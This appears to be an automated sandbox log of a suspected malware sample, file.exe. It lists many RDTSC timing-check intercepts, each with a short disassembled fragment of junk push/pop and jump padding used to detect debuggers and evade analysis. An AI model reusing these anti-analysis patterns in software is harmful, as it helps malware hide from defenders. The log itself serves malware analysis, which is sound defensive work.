rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9299A4 second address: 929A12 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b js 00007F988C7CE31Ch 0x00000011 je 00007F988C7CE316h 0x00000017 push 00000004h 0x00000019 push 00000000h 0x0000001b push ecx 0x0000001c call 00007F988C7CE318h 0x00000021 pop ecx 0x00000022 mov dword ptr [esp+04h], ecx 0x00000026 add dword ptr [esp+04h], 0000001Ah 0x0000002e inc ecx 0x0000002f push ecx 0x00000030 ret 0x00000031 pop ecx 0x00000032 ret 0x00000033 call 00007F988C7CE31Bh 0x00000038 sub dword ptr [ebp+12455E52h], edx 0x0000003e pop edi 0x0000003f nop 0x00000040 jc 00007F988C7CE31Eh 0x00000046 push eax 0x00000047 push eax 0x00000048 push edx 0x00000049 push esi 0x0000004a jmp 00007F988C7CE31Dh 0x0000004f pop esi 0x00000050 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 929A12 second address: 929A18 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9736CF second address: 9736FB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F988C7CE31Ch 0x00000008 pushad 0x00000009 popad 0x0000000a jmp 00007F988C7CE322h 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 jnp 00007F988C7CE316h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9760D1 second address: 9760D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9760D5 second address: 9760DF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9760DF second address: 9760E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9763E8 second address: 97640D instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jmp 00007F988C7CE328h 0x00000008 pop esi 0x00000009 pushad 0x0000000a jnl 00007F988C7CE316h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 97AAF4 second address: 97AB01 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 jg 00007F988D0B0286h 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 97AB01 second address: 97AB11 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a jns 00007F988C7CE316h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 97ADA5 second address: 97ADC9 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F988D0B0286h 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007F988D0B0292h 0x00000011 push eax 0x00000012 push edx 0x00000013 push esi 0x00000014 pop esi 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 97ADC9 second address: 97ADCD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 97ADCD second address: 97ADF6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 jnp 00007F988D0B02A9h 0x0000000d pushad 0x0000000e jmp 00007F988D0B0299h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 97AF44 second address: 97AF4A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 97B098 second address: 97B0A2 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 97B0A2 second address: 97B0A8 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 97B0A8 second address: 97B0AF instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 983B88 second address: 983B92 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F988C7CE316h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 981D8A second address: 981D97 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 981D97 second address: 981D9D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9820A5 second address: 9820BC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jmp 00007F988D0B0292h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9820BC second address: 9820D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F988C7CE323h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9820D8 second address: 9820DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9820DC second address: 9820FF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jmp 00007F988C7CE326h 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9820FF second address: 982111 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F988D0B028Eh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 982431 second address: 982435 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 982435 second address: 98243B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 98243B second address: 98244B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push esi 0x00000009 pop esi 0x0000000a jp 00007F988C7CE316h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 98244B second address: 98244F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 98244F second address: 982481 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F988C7CE31Eh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F988C7CE31Fh 0x00000013 ja 00007F988C7CE31Ch 0x00000019 jng 00007F988C7CE316h 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 982481 second address: 982493 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F988D0B028Eh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 982493 second address: 9824A7 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 js 00007F988C7CE316h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jo 00007F988C7CE329h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 98278F second address: 9827C9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F988D0B0295h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push ecx 0x0000000c jbe 00007F988D0B0286h 0x00000012 pop ecx 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007F988D0B0295h 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9827C9 second address: 9827CD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9827CD second address: 9827D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9827D3 second address: 9827D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 982A3D second address: 982A5D instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007F988D0B0294h 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 982A5D second address: 982A67 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F988C7CE316h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 982D7B second address: 982D7F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9832C0 second address: 9832C6 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9832C6 second address: 9832CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9832CC second address: 9832EA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F988C7CE324h 0x00000009 jns 00007F988C7CE316h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9832EA second address: 983317 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F988D0B0286h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push esi 0x0000000b je 00007F988D0B0286h 0x00000011 jmp 00007F988D0B0293h 0x00000016 pop esi 0x00000017 pop edx 0x00000018 pop eax 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 983317 second address: 98331B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 98331B second address: 983352 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 jmp 00007F988D0B028Fh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c ja 00007F988D0B0286h 0x00000012 jmp 00007F988D0B0298h 0x00000017 push edx 0x00000018 pop edx 0x00000019 popad 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9835FA second address: 983605 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F988C7CE316h 0x0000000a pop edi 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 983605 second address: 98360B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 98360B second address: 983611 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 983611 second address: 983615 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9838CA second address: 9838E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 jp 00007F988C7CE31Eh 0x0000000b popad 0x0000000c pushad 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9838E2 second address: 9838F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 ja 00007F988D0B0292h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9838F1 second address: 9838F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 98BE12 second address: 98BE16 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 98BE16 second address: 98BE2B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F988C7CE31Fh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 98BF89 second address: 98BF8D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 98BF8D second address: 98BF9D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a jbe 00007F988C7CE316h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 98BF9D second address: 98BFA3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 98BFA3 second address: 98BFA9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 994218 second address: 99421E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 99421E second address: 994226 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 994226 second address: 99422A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 99422A second address: 994233 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 992335 second address: 992339 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 992339 second address: 99233D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 99233D second address: 99235B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F988D0B0295h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9924AB second address: 9924C8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F988C7CE329h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9924C8 second address: 9924CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9924CE second address: 9924DF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 jmp 00007F988C7CE31Bh 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9924DF second address: 9924E3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9924E3 second address: 9924EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 push eax 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 99279C second address: 9927A0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 992A4A second address: 992A4E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 992A4E second address: 992A52 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 992A52 second address: 992A58 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 992A58 second address: 992A5D instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 992BAA second address: 992BBD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F988C7CE31Fh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 992BBD second address: 992BDA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F988D0B0298h 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 992E96 second address: 992E9B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 992FF9 second address: 992FFD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 992FFD second address: 993009 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F988C7CE316h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 993009 second address: 993020 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F988D0B0293h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 99317B second address: 993187 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebx 0x00000009 pushad 0x0000000a popad 0x0000000b pop ebx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 993187 second address: 99318D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 99318D second address: 993191 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 993191 second address: 993197 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 993197 second address: 9931AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b jne 00007F988C7CE316h 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9931AA second address: 9931B0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 99396C second address: 993970 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 993970 second address: 993993 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F988D0B0286h 0x00000008 jmp 00007F988D0B0296h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 99B611 second address: 99B617 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 99B617 second address: 99B61B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 99B61B second address: 99B647 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F988C7CE328h 0x0000000c jo 00007F988C7CE316h 0x00000012 push ecx 0x00000013 pop ecx 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 99B647 second address: 99B64B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 99B64B second address: 99B64F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 99B64F second address: 99B65D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jl 00007F988D0B028Eh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 99B0B1 second address: 99B0B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 99B1E3 second address: 99B222 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F988D0B028Dh 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jmp 00007F988D0B0290h 0x00000010 pop edi 0x00000011 jng 00007F988D0B02A0h 0x00000017 push edx 0x00000018 jmp 00007F988D0B0292h 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9A869A second address: 9A86A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9A86A0 second address: 9A86A4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9A86A4 second address: 9A86E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F988C7CE31Ah 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c jmp 00007F988C7CE31Ah 0x00000011 jmp 00007F988C7CE31Fh 0x00000016 jmp 00007F988C7CE325h 0x0000001b popad 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9A86E4 second address: 9A8714 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F988D0B0298h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jng 00007F988D0B029Eh 0x0000000f jns 00007F988D0B0288h 0x00000015 push eax 0x00000016 push edx 0x00000017 push ebx 0x00000018 pop ebx 0x00000019 push eax 0x0000001a pop eax 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9A885D second address: 9A8862 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9AE8B6 second address: 9AE8BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9AE8BC second address: 9AE8C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 jnl 00007F988C7CE31Ch 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9AE8C9 second address: 9AE8CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
